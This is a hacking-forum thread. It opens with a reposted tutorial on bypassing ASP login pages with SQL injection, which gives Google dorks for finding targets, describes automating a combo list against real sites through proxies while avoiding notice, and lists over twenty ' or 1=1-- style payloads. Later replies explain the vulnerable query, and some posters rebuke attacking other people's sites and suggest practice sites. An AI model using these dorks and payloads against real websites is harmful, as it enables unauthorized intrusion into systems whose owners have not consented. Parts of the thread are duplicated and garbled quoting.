ne of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&...=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
Credits comzec
-Ph4nt0m
sql injection
sql injection
found this on a site
-
Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
yeah but why does that work? does it have to be an .asp page? what about .php? (They both use SQL right?) do you have to type just a ' or do you have to actually type "' or 1=1--" or eaither one? i tryed on my own website to do this and it does not work. It looks kind of like a outdated hack, i googled it and most of the results came back did not work with these strings. It only looks like a way to get noticed really quick by a good system admin. How do you create your own injection strings? Does the information stay in the SQL database permenantly once its injected, or is it some kind of binary code that you are injecting to bypass temporarily like 1=1-- and the system just figures ok so 1=1 ok, keep going to the next page (admin page)? I am interested in learning more on SQL injection, thanks
Gone
of course it can't work in every website
like:
sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'
if we input the 'or'='or' for username and input anything for password than we will login success.
because the sql changed to
sql = "select * from Manage_User where UserName=''or'='or''and PassWord='000'
'or' always equals 'or'
if your website forbid input these evil code
that won't effect you.
like:
sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'
if we input the 'or'='or' for username and input anything for password than we will login success.
because the sql changed to
sql = "select * from Manage_User where UserName=''or'='or''and PassWord='000'
'or' always equals 'or'
if your website forbid input these evil code
that won't effect you.
-
Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
Still_Learning wrote: How do you create your own injection strings? Does the information stay in the SQL database permenantly once its injected, or is it some kind of binary code that you are injecting to bypass temporarily like 1=1-- and the system just figures ok so 1=1 ok, keep going to the next page (admin page)? I am interested in learning more on SQL injection, thanks
Gone
-
computathug
- Administrator
- Posts: 2693
- Joined: 29 Mar 2007, 16:00
- 17
- Location: UK
- Contact:
Yeah here is a big list you can exploit......Achkiller wrote:Does any one have a link to a site that this would work in?
Seriously i think you need to read the rules and get too grips with ethics.
One tip and one tip only.... search engine
The devil can cite Scripture for his purpose.
-- William Shakespeare, "The Merchant of Venice"
https://tshirt-memes.com
-- William Shakespeare, "The Merchant of Venice"
https://tshirt-memes.com
computathug wrote:Yeah here is a big list you can exploit......Achkiller wrote:Does any one have a link to a site that this would work in?
Seriously i think you need to read the rules and get too grips with ethics.
One tip and one tip only.... search engine
i was trying till 5:00am last night on google and not 1 worked
-
ebrizzlez
- Kage
- Posts: 732
- Joined: 31 Mar 2007, 16:00
- 17
- Location: Hidden in a Buffer Protection.
- Contact:
uh oh! now cats is really mad! /ROARcats wrote:You don't seem to get it, do you? Stop trying on other peoples sites, and learn about it on your own instead.
And stop double posting ....
LOL.
anyways, hacking is a whole ethic behind itself. Its not only a way of living, its a survival trait. We hackers don't thrive on destroying, but thrive on the knowledge we gain. Normally script-kiddies are the ones that give us a bad reputation and decide to destroy anything they can insight just to be cool and show off. This is the way of hacking, or the way of living.
If you do not understand this concept, than you might as well give up the flag.
If you really want to learn about sql injections, php file inclusions, lfi, rfis, and all that goody-goody stuff, than I recommend setting up your own apache website, I'll PM you a list of vulnerable PHP scripts I have for you to test, and you can try to mess around with your own server hands on without getting busted by the feds or something stupid. Or you can goto:
Code: Select all
www.hellboundhackers.orgCode: Select all
www.hackthissite.comCheers
[img]http://i81.photobucket.com/albums/j205/ebrizzlez/4lsint1.jpg[/img]
ebrizzlez wrote:uh oh! now cats is really mad! /ROARcats wrote:You don't seem to get it, do you? Stop trying on other peoples sites, and learn about it on your own instead.
And stop double posting ....
LOL.
anyways, hacking is a whole ethic behind itself. Its not only a way of living, its a survival trait. We hackers don't thrive on destroying, but thrive on the knowledge we gain. Normally script-kiddies are the ones that give us a bad reputation and decide to destroy anything they can insight just to be cool and show off. This is the way of hacking, or the way of living.
If you do not understand this concept, than you might as well give up the flag.
If you really want to learn about sql injections, php file inclusions, lfi, rfis, and all that goody-goody stuff, than I recommend setting up your own apache website, I'll PM you a list of vulnerable PHP scripts I have for you to test, and you can try to mess around with your own server hands on without getting busted by the feds or something stupid. Or you can goto:Code: Select all
www.hellboundhackers.orgwhich are two great hacking communities that give hands on experience of web exploitation.Code: Select all
www.hackthissite.com
Cheers
i understand what your saying. but you know when your new to something as i am to hacking. well web hacking, you just wana try it and have fun but iv had all the fun. and i printed out some stuff on SQL inections. can u pm me that stuff it would be really great thanks. =)